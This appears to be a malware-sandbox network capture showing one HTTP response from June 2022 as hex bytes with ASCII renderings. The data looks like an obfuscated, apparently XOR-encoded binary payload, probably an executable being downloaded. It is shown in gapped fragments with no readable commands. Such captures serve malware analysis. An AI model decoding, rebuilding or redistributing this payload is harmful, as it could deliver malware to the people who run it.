                                2022-06-26 07:43:09 UTC409INData Raw: 99 2d 68 30 d1 0d fe de 25 25 66 38 15 60 b6 99 41 26 68 d9 b8 d1 d8 da da 66 a3 29 60 da 99 e4 66 b2 66 2b 0d 0d 35 da da 60 b6 50 09 0e e5 7f 34 34 89 64 35 8d 0f 18 1c 25 66 38 15 60 b6 99 37 26 66 a9 b8 d1 d8 da da 75 0d fb 1b da da 60 b6 50 13 9e c4 c1 d6 23 da c6 ba 0e e5 7f 34 34 89 64 35 8d e8 63 1c 25 68 20 d1 66 f0 95 59 1c 25 0d f6 31 da da 9e c4 54 d6 23 da c6 0f 3a 83 36 66 c0 38 e7 2d 25 66 e5 30 66 11 5e e9 1d 66 20 2d 66 65 21 64 20 1d eb 20 21 2b 68 20 1d 75 8f 25 66 e8 e5 aa 1c 25 d7 dc 7c 85 10 1c 25 0d 44 9b da da 0d 99 d6 23 da 34 34 38 9e 30 66 11 5e e9 05 2e 7b 32 64 28 19 64 30 21 64 20 09 68 58 05 66 20 21 64 e2 0e 1b 64 40 1d 66 20 19 65 9c 05 27 04 e9 68 20 15 64 45 66 e2 0d ad 6b da da 66 fd 8f 25 8f 25 2e 66 e2 75 8f 25 8f 25
                                Data Ascii: -h0%%f8`A&hf)`ff+5`P44d5%f8`7&fu`P#44d5c%h fY%1T#:6f8-%f0f^f -fe!d !+h u%f%|%D#4480f^.{2d(d0!d hXf !dd@f e'h dEfkf%%.fu%%
                                2022-06-26 07:43:09 UTC413INData Raw: 50 95 4e b5 30 66 11 2c 2e 7b 32 a9 f7 99 2d 5e e9 15 0d a0 0d 23 da 66 d4 ad 30 da 66 fd 0e f7 66 9e 0d 0c 0b 23 da d7 dc 7c 59 6d 1c 25 0d 00 0b 23 da 64 1e 29 d7 dc 7c 19 6f 1c 25 0d 3b 0b 23 da 64 1e 2d d7 dc 7c 59 6d 1c 25 0d e2 0b 23 da 66 15 64 4e 31 66 eb 66 b2 0d a4 27 25 25 66 9e a5 58 da 25 99 ea 0d ed 0d 23 da 89 6a e0 25 25 25 25 5e e9 31 66 9e 3a 83 36 34 38 9e 66 e5 2e 7b 0d 98 0d 23 da 66 ff 66 15 66 ae a5 07 21 66 eb 0d bc c0 23 da 66 6b 29 0d c4 c0 23 da 66 6b 2d 0d bc c0 23 da 66 6b 31 0d b4 c0 23 da a9 b6 a3 e2 66 eb 0d 97 0d 23 da 83 36 9e 68 65 25 2e 7b 66 ff 66 15 60 b6 99 35 66 eb 0d 86 29 da da 16 fd 99 e0 0e e5 83 36 9e d5 dc 83 36 9e b5 2e 7b 32 66 1f 66 15 66 6b 31 66 7d 2d 26 5e d6 25 a1 00 66 ae 66 6b 31 0d 46 de 25 25 66 b2
                                Data Ascii: PN0f,.{2-^#f0ff#|Ym%#d)|o%;#d-|Ym%#fdN1ff'%%fX%#j%%%%^1f:648f.{#fff!f#fk)#fk-#fk1#f#6he%.{ff`5f)66.{2fffk1f}-&^%ffk1F%%f
                                2022-06-26 07:43:09 UTC418INData Raw: 35 8d 8a 83 1c 25 66 20 21 0d d0 b0 23 da 9e c4 b2 ff 23 da c6 15 83 34 38 9e b5 30 66 11 5e e9 1d 2e 7b 0e a4 64 28 1d 66 ff 64 20 21 0e e5 30 8d 2c 3a 1c 25 89 da 55 89 64 45 66 20 21 0d 61 d4 da da 0e e5 30 8d 59 3a 1c 25 89 da 55 89 64 45 66 9e 66 35 da 37 66 15 66 9e 0d 2a e6 25 25 06 15 68 20 1d 66 f3 0e f7 0d ec 07 23 da 66 30 1d 66 f3 66 9e 66 3d da 2e 31 66 30 1d 66 20 21 66 2d da 2c 51 0e e5 7f 34 34 89 64 35 8d 16 3a 1c 25 66 20 21 0d 7c d4 da da 9e c4 26 ff 23 da c6 15 0e e5 7f 34 34 89 64 35 8d 7d 3a 1c 25 68 20 1d 0d fd 05 23 da 9e c4 53 ff 23 da c6 15 83 36 34 34 38 9e 66 e5 30 66 11 5e e9 1d 2e 7b 32 0e b6 64 38 1d 66 cc 66 ff 64 20 21 0e e5 30 8d dc 85 1c 25 89 da 55 89 64 45 16 ce 99 89 66 20 21 0d 64 1d da da 0e e5 30 8d 09 3a 1c 25 89
                                Data Ascii: 5%f !##480f^.{d(fd !0,:%UdEf !a0Y:%UdEff57ff*%%h f#f0fff=.1f0f !f-,Q44d5:%f !|&#44d5}:%h #S#6448f0f^.{2d8ffd !0%UdEf !d0:%
                                2022-06-26 07:43:09 UTC422INData Raw: 30 1d 64 20 21 5e 18 b1 0d 1c 25 25 ea a9 ab 25 25 25 7c b1 0d 1c 25 0d 4b c0 da da 66 1d 0e e5 30 8d 8a 4a 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 69 66 ae 66 a2 0d 45 be da da 66 15 5e 58 21 25 99 2d 66 6b 2d 16 20 21 50 00 5e 58 1d 25 99 ea 66 7b 35 66 20 1d 0d fe e8 da da a9 e5 99 35 66 ae 66 a2 0d 23 bc da da 66 eb 0d e6 a0 23 da 26 5e d6 da 50 e1 0e e5 7f 34 34 89 64 35 8d db 4a 1c 25 7c b1 0d 1c 25 0d eb 09 da da 9e c4 f5 a4 23 da c6 13 3a 83 36 34 34 38 9e 68 65 25 30 66 11 2c 2e 7b 32 64 20 21 5e 18 b1 0d 1c 25 25 99 46 7c b1 0d 1c 25 0d 5e 09 da da 66 1d 0e e5 30 8d 12 95 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 04 66 ae 66 a2 0d 58 07 da da 66 15 66 6b 29 16 20 21 50 35 66 ae 66 a2 0d 9b bc da da 66 eb 0d 5e e9 23 da 26 5e d6 da
                                Data Ascii: 0d !^%%%%%|%Kf0J%UdEf:-&^%iffEf^X!%-fk- !P^X%f{5f 5ff#f#&^P44d5J%|%#:6448he%0f,.{2d !^%%F|%^f0%UdEf:-&^%ffXffk) !P5fff^#&^
                                2022-06-26 07:43:09 UTC426INData Raw: c6 c6 66 20 21 83 36 66 c0 38 9e 66 e5 2e 7b 32 5e e9 1d 66 cc 66 1f 66 fd 8f 65 8d 25 55 25 25 7b 8f 25 2e 0d 79 c0 23 da 64 29 49 68 69 49 29 75 7b 32 66 69 49 31 75 2e 0d 5a c0 23 da 66 29 49 34 7f 3a 83 36 9e 66 e5 30 66 11 5e e9 15 2e 7b 32 66 d4 66 17 66 fd 66 28 31 66 b2 66 9e 0d 84 da da da 64 20 1d 66 eb 0d b2 23 da da 66 ed 66 fb 66 9e 0d b9 da da da 64 20 21 68 20 15 75 8f 25 66 20 1d 75 66 20 21 75 8f 25 8f 25 2e 0d 2c be 23 da 66 15 a5 58 2d 25 99 f6 8f da 7b 0d dc c0 23 da 68 20 19 75 66 20 31 75 32 66 20 1d 75 2e 0d a3 09 23 da 66 eb 3a 83 36 66 c0 38 e7 2d 25 68 65 25 2e 7b 32 30 5c e9 f5 23 da da 66 0f 66 1d 0e b6 8f 65 8d 25 35 25 25 8d fe dc 25 25 8f 25 32 0d b9 09 23 da 64 29 49 5e 61 49 25 ea a9 84 25 25 25 66 29 49 eb 69 49 31 8d 68
                                Data Ascii: f !6f8f.{2^fffe%U%%{%.y#d)IhiI)u{2fiI1u.Z#f)I4:6f0f^.{2ffff(1ffd f#fffd !h u%f uf !u%%.,#fX-%{#h uf 1u2f u.#f:6f8-%he%.{20\#ffe%5%%%%%2#d)I^aI%%%%f)IiI1h
                                2022-06-26 07:43:09 UTC429INData Raw: e9 19 2e 7b 32 0e b6 64 38 19 66 d4 64 30 1d 64 20 21 66 20 21 0d e3 dd 23 da 66 20 1d 0d db dd 23 da 0e e5 30 8d a8 b1 1c 25 89 da 55 89 64 45 0e 1b 68 20 19 66 30 21 0d 5e d9 23 da 66 20 19 0d 7e db 23 da 75 66 a2 94 dc 25 25 25 66 f0 d5 ad 1c 25 0d e1 eb 23 da 5e e9 29 66 30 19 66 20 1d 0d 8f 94 23 da 66 fd 26 5e d6 da 50 ea 66 e2 68 29 d5 66 30 19 0d dc d9 23 da c6 10 66 e2 68 29 d5 75 66 a6 df dc 25 25 25 66 20 19 0d db dd 23 da 66 20 1d 0d 73 db 23 da 66 ed de a6 68 20 19 df dc 25 25 25 0d b8 dd 23 da 6b 5e 58 19 25 50 84 0e e5 7f 34 34 89 64 35 8d f9 b1 1c 25 68 20 19 df de 25 25 25 0d a5 8e 23 da 9e c4 d7 d1 23 da c6 c6 3a 83 36 66 c0 38 9e b5 2e 7b 32 30 2c 66 c4 66 ff 64 29 49 68 4e dc 66 fb 66 a0 0d 49 94 23 da 73 60 1b a1 f6 6b 0e da 66 41 49
                                Data Ascii: .{2d8fd0d !f !#f #0%UdEh f0!^#f ~#uf%%%f%#^)f0f #f&^Pfh)f0#fh)uf%%%f #f s#fh %%%#k^X%P44d5%h %%%##:6f8.{20,ffd)IhNffI#s`kfAI
                                2022-06-26 07:43:09 UTC433INData Raw: 25 df f1 d7 1c 25 0d 11 7e 23 da da 10 59 c4 1c 25 da 10 41 c4 1c 25 da 10 25 c4 1c 25 8d 05 d7 1c 25 68 60 99 da da da df 29 25 25 25 0d cc cb 23 da 66 60 99 da da da 0d 4b cd 23 da 75 0d 05 a2 23 da 7e ed 0d 1c 25 da 10 71 c4 1c 25 8d 11 d7 1c 25 da 10 5d c4 1c 25 8d 21 d7 1c 25 da 10 f5 0d 1c 25 68 60 95 da da da df e0 25 25 25 0d 8a cb 23 da 66 60 95 da da da 0d 09 82 23 da 75 7c ed 0d 1c 25 75 0d 7d a2 23 da 7e dd 0d 1c 25 df 6d 3e 65 25 dd dd 0d 1c 25 0d f9 11 da da 7c ed 0d 1c 25 75 0d 9c eb 23 da dd 59 c4 1c 25 df 31 8e 1c 25 0d 63 7e 23 da dd 41 c4 1c 25 df 3d 8e 1c 25 0d 0a 7e 23 da dd 25 c4 1c 25 df 49 8e 1c 25 0d 45 7e 23 da dd 5d c4 1c 25 df 55 8e 1c 25 0d ec 7e 23 da dd 71 c4 1c 25 df 65 8e 1c 25 0d 27 7e 23 da dd f5 0d 1c 25 df 71 8e 1c 25
                                Data Ascii: %%~#Y%A%%%%h`)%%%#f`K#u#~%q%%]%!%%h`%%%#f`#u|%u}#~%m>e%%|%u#Y%1%c~#A%=%~#%%I%E~#]%U%~#q%e%'~#%q%
                                2022-06-26 07:43:09 UTC437INData Raw: 1c 25 7c ed 0d 1c 25 75 0d 2c 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d a8 01 da da 8d e5 db 1c 25 7c ed 0d 1c 25 75 0d 08 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 84 01 da da 7c ed 0d 1c 25 75 0d bb db 23 da dd 59 c4 1c 25 df 09 db 1c 25 0d ee 6e 23 da 68 60 99 d8 da da 94 f9 8e 1c 25 66 f0 59 c4 1c 25 0d 90 70 23 da 66 60 99 d8 da da 0d 83 72 23 da 66 f5 68 60 9d d8 da da 0d 64 b9 23 da 66 60 9d d8 da da df 25 a5 25 25 0d cc 43 da da 7e ed 0d 1c 25 8d 0d db 1c 25 7c ed 0d 1c 25 75 0d d1 db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 4d 01 da da 8d 21 db 1c 25 7c ed 0d 1c 25 75 0d ad db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 29 01 da da 8d 31 92 1c 25 7c ed 0d 1c 25 75 0d 89 db 23 da 7e dd 0d 1c 25
                                Data Ascii: %|%u,#~%M>e%%%|%u#~%M>e%%|%u#Y%%n#h`%fY%p#f`r#fh`d#f`%%%C~%%|%u#~%M>e%%M!%|%u#~%M>e%%)1%|%u#~%
                                2022-06-26 07:43:09 UTC441INData Raw: 1c 25 a9 25 a9 25 25 25 a5 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 25 39 25 39 25 39 25 39 dc a9 67 a9 dc 2b 67 2b 25 41 25 41 25 25 25 39 e2 a5 22 a5 e2 27 22 27 25 25 25 25 25 25 25 25 25 25 25 25 2d 25 2d 25 25 25 25 25 25 25 25 25 25 25 25 25 35 1c c5 dc 3d dc 45 dc 09 45 09 45 da da 25 25 25 25 25 25 25 25 25 25 da da da da da da 35 dc 25 25 08 e0 1a 25 1a 27 1a 25 1a 27 1a 25 1a 25 1a 25 1a 27 35 dc da da da da da da da da da da da da da da fe 65 fe 65 fe 27 fe 27 da da da da da da da da 1a 25 1a 27 0a 25 1a 27 18 25 18 25 1a 25 1a 25 25 25 25 a5 25 a5 25 a5 25 25 25 25 da da da da da da da da da da da da da da da da da da da da 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 02 67 1a 25 1a 25
                                Data Ascii: %%%%%-%-%-%-%-%-%-%-%%9%9%9%9g+g+%A%A%%%9"'"'%%%%%%%%%%%%-%-%%%%%%%%%%%%%5=EEE%%%%%%%%%%5%%%'%'%%%'5ee''%'%'%%%%%%%%%%%%%EEEEEEEEEEEEEEEEg%%
                                2022-06-26 07:43:09 UTC445INData Raw: 25 25 71 4a 3e 3c 91 1c 91 91 4a 3e 25 25 25 25 22 40 99 79 44 3e 46 1e 4a 50 93 99 25 25 25 25 2c 50 40 97 54 75 40 97 8b 4a 97 48 3c 93 3e 40 1e 4a 50 93 99 40 97 25 25 25 22 40 99 7b 40 97 4e 44 4a 93 25 25 25 25 22 40 99 1e 50 97 97 40 93 99 79 8d 97 40 3c 89 24 89 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 69 40 3e 97 40 48 40 93 99 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 24 93 3e 97 40 48 40 93 99 25 25 25 25 7b 44 97 99 50 3c 91 2c 50 40 97 54 25 25 25 25 32 44 89 40 1e 8d 3c 97 79 4a 28 50 91 99 44 67 54 99 40 25 25 25 28 50 91 99 44 67 54 99 40 79 4a 32 44 89 40 1e 8d 3c 97 25 25 25 91 4e 99 97 91 40 93 1c 25 25 25 25 91 4e 99 97 3e 95 54 93 1c 25 25 25 71 4a 3c 89 71 44 87 97 3c 97 54 20 9d 1c 25 25 25 25 22 40 99 79 8d 97 40 3c 89 71 4a
                                Data Ascii: %%qJ><J>%%%%"@yD>FJP%%%%,P@Tu@JH<>@JP@%%%"@{@NDJ%%%%"@P@y@<$%%%%$@J>F@i@>@H@%%%%$@J>F@$>@H@%%%%{DP<,P@T%%%%2D@<yJ(PDgT@%%%(PDgT@yJ2D@<%%%N@%%%%N>T%%%qJ<qD<T %%%%"@y@<qJ
                                2022-06-26 07:43:09 UTC450INData Raw: 59 f5 59 f9 59 fd 59 01 59 05 59 09 59 0d 59 11 59 21 59 41 10 49 10 4d 10 51 10 55 10 59 10 5d 10 61 10 65 10 69 10 7d 10 9d 10 a5 10 a9 10 ad 10 b1 10 b5 10 b9 10 bd 10 c1 10 c5 10 d9 10 f9 10 01 10 05 10 09 10 0d 10 11 10 15 10 19 10 1d 10 21 10 35 5b 55 5b 5d 5b 61 5b 65 5b 69 5b 6d 5b 71 5b 75 5b 79 5b 7d 5b 95 5b b5 5b bd 5b c1 5b c5 5b c9 5b cd 5b d1 5b d5 5b d9 5b dd 5b ed 5b 0d 5b 15 5b 19 5b 1d 5b 21 5b 25 12 29 12 2d 12 31 12 35 12 49 12 69 12 71 12 75 12 79 12 7d 12 81 12 85 12 89 12 8d 12 91 12 a1 12 c1 12 c9 12 cd 12 d1 12 d5 12 d9 12 dd 12 e1 12 e5 12 e9 12 fd 12 1d 12 25 5d 29 5d 2d 5d 31 5d 35 5d 39 5d 3d 5d 41 5d 45 5d 5d 5d 7d 5d 85 5d 89 5d 8d 5d 91 5d 95 5d 99 5d 9d 5d a1 5d a5 5d b9 5d d9 5d e1 5d e5 5d e9 5d ed 5d f1 5d f5 5d f9 5d
                                Data Ascii: YYYYYYYYY!YAIMQUY]aei}!5[U[][a[e[i[m[q[u[y[}[[[[[[[[[[[[[[[[[![%)-15Iiquy}%])]-]1]5]9]=]A]E]]]}]]]]]]]]]]]]]]]]]]]
                                2022-06-26 07:43:09 UTC454INData Raw: e9 14 f5 14 f9 14 09 14 11 14 15 14 19 14 1d 14 21 14 25 5f 29 5f 2d 5f 31 5f 35 5f 39 5f 3d 5f 41 5f 45 5f 49 5f 4d 5f 51 5f 55 5f 59 5f 5d 5f 61 5f 65 5f 69 5f 6d 5f 71 5f 75 5f 79 5f 7d 5f 81 5f 85 5f 89 5f 8d 5f 91 5f 95 5f 99 5f 9d 5f a1 5f a5 5f a9 5f ad 5f b1 5f bf 5f d1 5f df 5f e3 5f f5 5f c4 5f 19 5f 29 16 39 16 41 16 45 16 49 16 4d 16 51 16 55 16 59 16 5d 16 61 16 65 16 69 16 6d 16 71 16 75 16 79 16 7d 16 81 16 85 16 89 16 8d 16 91 16 95 16 99 16 9d 16 a1 16 a5 16 a9 16 ad 16 b1 16 b5 16 b9 16 bd 16 c1 16 c5 16 c9 16 cd 16 d1 16 d5 16 d9 16 dd 16 e1 16 e5 16 e9 16 ed 16 f1 16 f5 16 f9 16 09 16 d0 16 d4 16 31 61 51 61 59 61 5d 61 61 61 65 61 69 61 6d 61 71 61 75 61 79 61 7d 61 81 61 85 61 89 61 8d 61 91 61 95 61 a1 61 c1 61 c9 61 cd 61 d1 61 d5
                                Data Ascii: !%_)_-_1_5_9_=_A_E_I_M_Q_U_Y_]_a_e_i_m_q_u_y_}_____________________)9AEIMQUY]aeimquy}1aQaYa]aaaeaiamaqauaya}aaaaaaaaaaaa
                                2022-06-26 07:43:09 UTC458INData Raw: 4e ac 99 59 ea 38 a5 bb c7 46 ac 3f d9 43 18 a5 db c7 82 ac 26 0d 50 99 25 58 af b3 3e a5 ac 0c 33 8b b1 b4 3c 81 b1 62 20 85 64 7d 3f 4b a2 3b 3e c0 7d 10 7b 6a 10 3e f8 7d 12 9b f0 f6 e5 c3 3c ca 2d 49 27 66 a5 ee 11 2d 83 a9 35 e7 91 a7 b5 b5 22 7d 71 7d 1e cd 00 11 fe d9 37 df 2d 32 e4 5e a9 0c e7 02 47 6e cd 2a d9 00 9f 37 d4 e9 9d 87 5f 8c b5 7d 6b d1 4b 13 fc 43 fc c3 00 83 02 33 ee 3a 6e 6d 49 33 a4 b7 09 73 2f fc 00 b5 57 24 e6 24 46 6d b6 6d 08 c9 2e c9 63 f7 35 44 c1 71 4b c6 b5 48 a4 03 09 2d d7 a5 d1 45 72 6c 92 b5 ea b5 2a b7 d6 a4 9e 09 92 39 5f a0 ad 07 71 e4 c7 49 77 c9 b9 37 6f 10 40 1a c0 29 80 7a 57 67 74 c5 cf 2c a8 84 c3 f9 2d cf ad 5f 7a 7f 24 48 c5 9b 75 0a 2e 62 84 ee 59 50 bf 00 a8 76 3b 1e a6 c9 08 7e b0 f5 bf 44 42 44 d2 8d 0a
                                Data Ascii: NY8F?C&P%X>3<b d}?K;>}{j>}<-I'f-5"}q}7-2^Gn*7_}kKC3:nmI3s/W$$Fmm.c5DqKH-Erl*9_qIw7o@)zWgt,-_z$Hu.bYPv;~DBD
                                2022-06-26 07:43:09 UTC461INData Raw: fc 57 57 f7 82 f9 23 51 2d e9 c7 0c 6f ad c7 ad 7b 86 00 16 56 e0 6c 6c 6c 63 e6 c8 ba 25 15 7f ee ac ac 2c 39 3b d3 d2 df 10 2a 31 85 37 86 fe 10 10 b0 25 f1 e0 19 21 12 88 ee 95 1f 2e e7 2b c1 e2 cb d8 22 35 f3 d6 0c eb da 27 d6 1a b6 1a de 25 6d ce 17 f3 d8 ac e7 61 25 25 25 25 24 20 73 69 d3 67 85 a7 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: WW#Q-o{Vlllc%,9;*17%!.+"5'%ma%%%%$ sig%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:09 UTC465INData Raw: 4d 41 ff e3 b7 a0 66 07 74 70 3c e9 ac ac 6b c4 02 a2 ed 7f 9a 72 c7 f9 b1 bb cc b1 d2 34 bd ee e0 cd ba 96 60 60 66 43 40 f3 67 fe 13 9a a3 82 99 b2 44 d7 fb ca 00 fb bd ed c9 23 ef fa 71 93 5b 76 44 8f 8f 17 56 d9 46 d3 01 9c c1 bd 85 b7 0b 80 be 1d ce 5f 7a e2 2d 55 33 e9 75 38 fd 91 9b 53 3a e3 71 22 a2 78 ec b6 1d a5 2f 1e c5 e8 02 6a 0e 06 79 45 fc 5b 64 03 86 98 41 84 0d f6 dc c5 1f 14 98 1f 51 f1 f6 12 93 c5 4d 57 0c 0c 0c be 73 f5 48 92 be dd 7b 66 4c 5c c3 cb ae 42 94 ff f2 e7 07 30 20 e9 3f ee a2 7d 3b 45 e9 35 a5 ae c4 09 f9 84 2e 29 e0 44 6d 24 24 cc 5f 3c 2a 2a ea 40 40 40 c9 8f 38 11 84 df 65 3a 69 57 4a 91 fd 5d 91 c3 e5 33 15 83 e6 ce 07 a0 66 f9 b0 b0 87 8e b4 a4 ef ef 67 82 e6 80 90 d0 2f c2 f3 78 82 90 90 70 68 f6 ba 49 49 89 3f 00 00
                                Data Ascii: MAftp<kr4``fC@gD#q[vDVF_z-U3u8S:q"x/jyE[dAQMWsH{fL\B0 ?};E5.)Dm$$_<**@@@8e:iWJ]3fg/xphII?
                                2022-06-26 07:43:09 UTC469INData Raw: 23 2c e3 0c 24 3b 6c 3d 5d 92 98 80 1b 5c 28 ae 7d 6b 39 42 18 25 2e 30 47 29 12 fe af 54 63 0e cb 46 23 71 a3 31 ce 07 b3 cd 8f c1 66 cf d7 98 c4 28 73 e0 e0 dc 5c db 12 aa 05 46 f5 5b fb 60 24 36 21 59 be 19 06 5b dd d7 1e 65 55 6c aa 37 4c 66 21 d4 ec a8 f6 ef fb fd 8b ea a2 73 7f 55 4d 2e a1 9c 4d 2e bd a5 02 d2 e1 9b 20 c7 1a b9 bb ab fd 73 f3 80 42 94 09 ff 6f ca b9 18 f0 c9 5f 81 92 52 4b 75 dc e9 52 35 0f e0 61 09 78 79 f0 af 00 89 0a a4 68 16 7d f3 cd 18 fe 62 46 b9 51 9f ef be a4 49 0c 2e 4b 27 53 36 53 be bc 76 22 b7 cd 3e 0f b0 e7 c9 8b a8 b2 6e 9f 65 69 13 c7 00 85 c6 e0 51 82 3d 43 37 ad 0f d1 33 97 f2 ab d5 8f 00 16 f5 5f 44 89 3a 09 70 3a a5 e5 af 08 9c f1 5e 43 f8 e5 d3 5c 4f ba ed 6e 4c 84 d9 f2 07 78 46 3c 62 07 a1 1f 68 a6 fc 4e a0 02
                                Data Ascii: #,$;l=]\(}k9B%.0G)TcF#q1f(s\F[`$6!Y[eUl7Lf!sUM.M. sBo_RKuR5axyh}bFQI.K'S6Sv">neiQ=C73_D:p:^C\OnLxF<bhN
                                2022-06-26 07:43:09 UTC473INData Raw: 68 b7 0e 54 96 1f 6a b3 8d 2c 6c b1 29 ff d4 ec d7 47 31 95 47 5c fd 81 12 24 01 78 f4 44 c4 2b c7 ff 91 89 e3 4c 4e 75 9d b3 7f 73 41 8f be 07 92 d5 c3 37 99 35 eb 97 6f c4 f7 4c b6 6f 07 a4 11 79 e8 7c 07 5f b8 da 2c ea 16 d1 75 76 4b af 03 f4 92 26 69 ff bf 66 6a a2 1d eb c9 4e d3 1b 25 0c d8 cf 9a 84 41 e5 30 38 65 db 4d fb 16 5c bd 53 7f 59 74 04 d3 5f 5d 56 22 95 b6 86 20 82 f7 ea 84 ed 15 fd cf 50 79 63 3b 00 53 08 c9 d5 88 ad 1b de 76 98 85 a2 73 97 dd 5c f5 03 71 cd cb 8b 3f ff 23 24 82 ba 34 e9 0f 11 02 a9 de 6b d0 d3 2e fa 76 85 5a c1 5b 1d 4e b5 e4 55 3e 71 ef a5 da 4d f4 92 9c 01 9d 0c de 09 55 ae e6 23 d4 8b cf 19 88 28 30 26 76 b4 55 8f 2b 21 e9 e9 fb dc f8 8f 86 d0 d5 f4 4d 8c a2 ea 9f 67 6c 43 3d 10 05 8a 3e e9 b1 3a f0 97 95 fa 8a 3f 4f
                                Data Ascii: hTj,l)G1G\$xD+LNusA75oLoy|_,uvK&ifjN%A08eM\SYt_]V" Pyc;Svs\q?#$4k.vZ[NU>qMU#(0&vU+!MglC=>:?O
                                2022-06-26 07:43:09 UTC477INData Raw: 39 dc 7e 73 79 c2 4b 51 dc 98 33 f8 48 e4 e1 62 e4 9e 3f 72 45 27 04 4e 05 31 69 a4 15 c2 1e 11 1d 78 50 60 9d df fc 8d 08 2f 4a 80 5d 0c a5 d0 9d 46 11 19 9f 59 68 16 49 89 7e 3a ea 4f c3 11 79 f1 68 d7 9d ef 70 10 10 df 8f 5e d7 bf 08 b0 6d 7c 34 d3 49 4f 88 dd ae 12 c3 23 a3 54 e7 82 09 89 f5 df 1f ba 58 56 cb 64 12 3a 3c b6 75 6f 03 59 62 be 28 5c 08 32 bf 8f f5 05 4e 22 5f 81 25 83 d1 66 ee 90 95 f7 ce 42 b1 ad 3d c4 75 ba 04 aa 11 69 c4 35 7a 88 06 e0 5d 73 ac 33 79 58 3d 28 61 b5 3c 72 c5 e7 bf 56 60 b9 b1 a2 f5 b6 8e b0 6e 29 f2 18 25 b7 52 2d 3f fa 52 cf 5e f3 c1 08 b0 0a 0d 4f 17 7e 8a 04 a2 c5 70 1d bc 0a ec 34 52 44 50 e8 df 8b 09 b2 ca 98 ea b8 01 86 6e f6 d7 22 b1 9a 69 9c d2 c5 9f cc f1 a1 52 47 5e 44 61 30 60 2c f9 df 6f 87 18 bb bd 2d 65
                                Data Ascii: 9~syKQ3Hb?rE'N1ixP`/J]FYhI~:Oyhp^m|4IO#TXVd:<uoYb(\2N"_%fB=ui5z]s3yX=(a<rV`n)%R-?R^O~p4RDPn"iRG^Da0`,o-e
                                2022-06-26 07:43:09 UTC482INData Raw: 62 34 71 ee d1 8f e9 8e 05 6e 12 41 57 67 df b1 60 d2 2c ad 8d c9 94 ad 9d dc 2e 3a e4 8b df 52 b0 d5 57 18 85 4f 94 c3 89 81 57 ee e2 43 8a 01 21 cb bb 34 b3 39 9e 1a 52 fc 0a 69 12 f6 5b ec 01 e2 99 a1 42 da ea 57 e4 f4 9a b9 5a 2c 7d 3f 6d 22 8d 0b 5e 83 44 fd e3 47 6f ae 65 a3 24 8f fe 51 04 78 77 64 33 2e 81 48 d0 8d ee fd 53 2a 4a 41 e7 7a 01 f0 de 9b 6a 17 18 6d 3c 75 6d 3a ec b6 99 1f 49 00 23 e6 69 b1 bc 42 27 ec fe c2 b8 c8 7f 9c 39 e2 7b 66 f8 c7 60 8b 01 02 2a f4 11 d3 a8 e5 81 eb e9 47 be 6c ba a9 2a 8c 1a e2 60 11 04 a2 3b 69 39 4d d1 e3 70 3b 8e d7 78 67 e5 c5 f3 69 65 48 e2 ec 23 f2 59 93 bd 7b 07 c2 75 48 d4 ca 3c 72 b9 2b fb ca 34 e4 c9 f2 e9 4b a0 ee 1d 0b b9 37 c3 ec 2d 9a fc a3 12 fd a8 16 4c 4e d0 3e 36 3e 6a 85 3a 4e 7b 45 03 4b aa
                                Data Ascii: b4qnAWg`,.:RWOWC!49Ri[BWZ,}?m"^DGoe$Qxwd3.HS*JAzjm<um:I#iB'9{f`*Gl*`;i9Mp;xgieH#Y{uH<r+4K7-LN>6>j:N{EK
                                2022-06-26 07:43:09 UTC486INData Raw: e8 64 21 81 90 ce 85 4a 79 4f 53 c9 ea 03 40 6f b6 c1 db 05 be a7 0c 50 f8 fe 68 1d 32 28 fc eb 46 68 39 75 0e 60 6b a7 6f 57 e8 f3 a9 1c 24 05 7b 10 30 d3 c7 87 90 b3 27 22 43 fc 4a b5 b3 f1 a4 b0 f6 93 5a 3a f6 e7 5a 0c 3e 5e 11 78 f0 8a 20 d6 b5 6c 43 af cd d7 5c 0e 08 1c 17 9c 3b ca 59 7f 4d 6d 12 d3 25 59 6f c3 6d 48 92 d2 8b eb 8c 7d d0 1f 6e 81 af 15 d9 f5 23 0b a7 af 81 28 f5 ea 24 0f 30 38 1f 14 8a 6a e8 d2 f4 60 74 85 dd 38 2e b2 a8 df d7 ee d3 ad ac 9c 67 1d 24 bb eb 8f 35 71 d9 d0 31 10 0d c3 34 57 54 36 e5 67 af 91 5e 1e 61 4c 2e fe 95 5c 3a 32 f5 8a d3 8c 83 7d e8 50 a2 04 02 94 66 f3 05 20 18 84 58 2f 9b 87 1b 58 62 fc 72 91 cf 2f 4c 6f cc 77 b4 62 62 4d 4d 3c fc 49 88 5e 83 92 b2 c7 80 44 cf 5e ec 02 ce 74 0d 27 29 76 4d d7 07 be 45 23 fc
                                Data Ascii: d!JyOS@oPh2(Fh9u`koW${0'"CJZ:Z>^x lC\;YMm%YomH}n#($08j`t8.g$5q14WT6g^aL.\:2}Pf X/Xbr/LowbbMM<I^D^t')vME#
